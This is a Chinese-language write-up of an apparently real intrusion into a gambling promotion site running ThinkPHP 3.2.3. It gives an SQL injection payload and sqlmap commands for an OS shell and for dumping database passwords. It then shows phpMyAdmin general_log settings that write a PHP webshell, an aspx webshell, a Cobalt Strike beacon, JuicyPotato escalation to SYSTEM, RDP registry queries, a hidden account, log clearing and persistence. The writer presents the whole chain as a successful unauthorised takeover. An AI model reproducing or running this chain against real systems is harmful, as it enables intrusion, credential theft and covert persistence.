起因

最近在fofa翻目标C段的时候,碰巧看到了这个站便记了下来,等下班回家后直接拿下。

目标环境信息

BC类的活动页很多都是thinkphp二改的站,我们主要确定当前tp的版本号。

http://www.abc.com/index.php?s=1

目标环境信息

  • Windows
  • ThinkPHP v.3.2.3
  • 开启Debug模式
  • 网站绝对路径 D:\web1\abc.com\wwlsoeprsueords\

用工具扫描日志文件

tp3注入漏洞不存在,日志文件在/addons/Runtime/Logs/admin/路径下,但并没有扫到任何的日志文件,猜测日志文件可能为另外一个命名格式

eg. 1606510976-20_11_28.log

时间戳-年_月_日.log

该站点没有CDN,在fofa上搜IP发现999端口为phpmyadmin页面

寻找注入

一般来说,这类的活动推广页申请进度查询是存在注入的,用burp抓包

payload如下:

username=123' and (extractvalue(1,concat(0x7e,(select user()),0x7e))))--+&id=13

果不其然,存在注入,还是root权限,直接就上sqlmap跑

python3 sqlmap.py -r 1.txt --random-agent --dbms=mysql --os-shell

还跑了几种其他类型的注入,但我们直接--os-shell报错,尝试了几次都一样返回No output,猜测可能有某种防护产品。

getshell

前面我们有找到phpmyadmin页面,我们枚举数据库账户和密码

python3 sqlmap.py –r 1.txt --string="Surname" --users --password

并且已经帮我们解码明文了,root账号登录后报错#1045 无法登录服务器,换成dog1账号登录成功

phpmyadmin写shell:

  • 导出文件
  • 写日志文件

SHOW GLOBAL VARIABLES LIKE "%secure%";

当secure_file_priv的值为null,表示限制mysql不允许导入|导出

当secure_file_priv的值没有具体值时,表示不对mysql的导入|导出做限制

用命令打开日志保存状态,设置日志保存路径

set global general_log = "ON";

set global general_log_file='D:/web1/abc.com/robots.php';

在sql查询语句处执行我们的php一句话,然后用蚁剑去连日志文件robots.php即可getshell

绕过限制上线cs

查看phpinfo(),发现ban了成吨的函数,无法执行命令。

我们可以上传aspx马进行绕过,这里我使用的是冰蝎3的aspx马

现在可以执行命令了,但还是无法查看相关文件夹等其他问题。

查看系统有无杀软,准备上线

tasklist /svc

没有任何杀软,用cs生成exe上传到根目录,然后启动执行上线

用烂土豆可以直接提到system权限

直接通过注册表查是否开启3389,端口号是多少

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber # 查看RDP服务的端口

建一个隐藏用户直接远程登录过去,清除日志,做自启动,拿下该站点

实战|对某棋牌站的一次getshell相关推荐

  1. Unity+KBEngine实战系列1——棋牌(含完整教程与源码)

    2019独角兽企业重金招聘Python工程师标准>>> Unity+KBEngine实战系列1--棋牌(含完整教程与源码) 分享下KBEngine + u3d做的房卡麻将,就是一般的 ...

  2. HTML实战训练(1)——美站库

            本人新手,在学习了近一个月HTML之后第一次进行了实战项目,写个博客主要是想记录一下自己的学习路程,欢迎高手指出缺点         本次实战训练主要是运用自己所学知识写出美站库的界面 ...

  3. jwt实战详解--B站编程不良人视频笔记

    文章目录 前言 一.什么是JWT 二.JWT能做什么 1.授权 2.信息交换 三.为什么使用JWT 四.JWT的结构是什么 五.使用JWT 1.引入依赖 2.生成token 3.根据令牌和签名解析数据 ...

  4. 【Python实战】Django建站笔记

    前一段时间,用Django搭建一个报表分析的网站:借此正好整理一下笔记. 1. 安装 python有包管理工具pip,直接cd Python27/Scripts,输入 pip install djan ...

  5. Python模拟登录实战,采集整站表格数据

    本节主要内容有: 通过requests库模拟表单提交 通过pandas库提取网页表格 很多人学习python,不知道从何学起. 很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手. ...

  6. 【第4篇】Python爬虫实战-抓取B站弹幕视频

    目录 1.获取视频cid参数 2.程序源代码 3.程序运行结果 4.总结 1.获取视频cid参数 首先我们打开一个有弹幕的B站视频,比如:<我好像在哪见过你>人们把难言的爱都埋入土壤里_哔 ...

  7. 实战:垃圾站建站大法 疯狂掠夺百度流量

    也许多数做站的朋友,特别是做垃圾站的朋友,更特别是做垃圾站还快速优化关键字的朋友,都有过这些经验:看到百度收录就开始高兴,看到百度来了几千IP流量,就更高兴:再看到百度来了上万IP时,就更别提多高兴了 ...

  8. springboot+veu实战项目-天猫整站

    目录 天猫整站 Springboot 一:技术准备 二:开发流程 三:本地演示 1 : 下载并运行 2 : 访问地址 3 : nginx 4 : nginx.conf 配置文件 5 : 启动nginx ...

  9. springboot实战项目----天猫整站---how2j

    目录 天猫整站 Springboot 一:技术准备 二:开发流程 三:本地演示 1 : 下载并运行 2 : 访问地址 3 : nginx 4 : nginx.conf 配置文件 5 : 启动nginx ...

最新文章

  1. 人人都能看懂的LSTM
  2. discuz在线人数的实现原理(Discuz6.1.0)
  3. 音视频技术开发周刊 | 211
  4. java 抽象类和接口有什么区别
  5. 在ASP.Net Core 中使用枚举类而不是枚举
  6. 保存点云数据_3D点云配准(二多幅点云配准)
  7. 飞秋_常用正则表达式集锦
  8. leetcode41. First Missing Positive
  9. android-- dp px sp长度单位的区别
  10. JavaScript 基础(二)
  11. 将n划分成最大数不超过m的划分数
  12. c语言教材系统管理课设
  13. Android ListView优化
  14. arm-linux 交叉编译toolchain
  15. 计算机CPU风扇的功能及作用,CPU和风扇之间涂的是什么东西
  16. 平台型时间信号强度曲线_MR动态增强扫描时间-信号强度曲线在骨骼肌肉系统肿瘤定性诊断中的价值...
  17. es---elasticsearch-篇二:idea操作es,常用查询DSL
  18. Oracle SYSAUX 表空间 说明
  19. 古月居ROS入门21讲——10-12.Publisher和Subscriber的编程实现 话题消息的定义与使用
  20. 聊聊“扭蛋”,即常规的付费抽奖

热门文章

  1. 揪出XXL-JOB中的细节
  2. 快用一用 lambda 表达式吧,让你的代码更简洁、更漂亮!
  3. C语言:L1-035 情人节 (15分)(解题报告)
  4. 编译原理陈意云3-20 (a) 证明下面文法 S→AaAb|BbBa A→ε B→ε 是LL(1)文法,但不是SLR(1)文法。
  5. 计算机linux入门教程,Turbolinux入门教程1
  6. json python无效语法_在python中打开无效的json文件
  7. Web群集与日志管理Haproxy搭建
  8. 580分左右的计算机院校,2021年高考580分可以上什么大学 580分左右的院校
  9. linux测量某个ip的网速,linux下测网速
  10. python 通登录银行_Python3 适合初学者学习的银行账户登录系统实例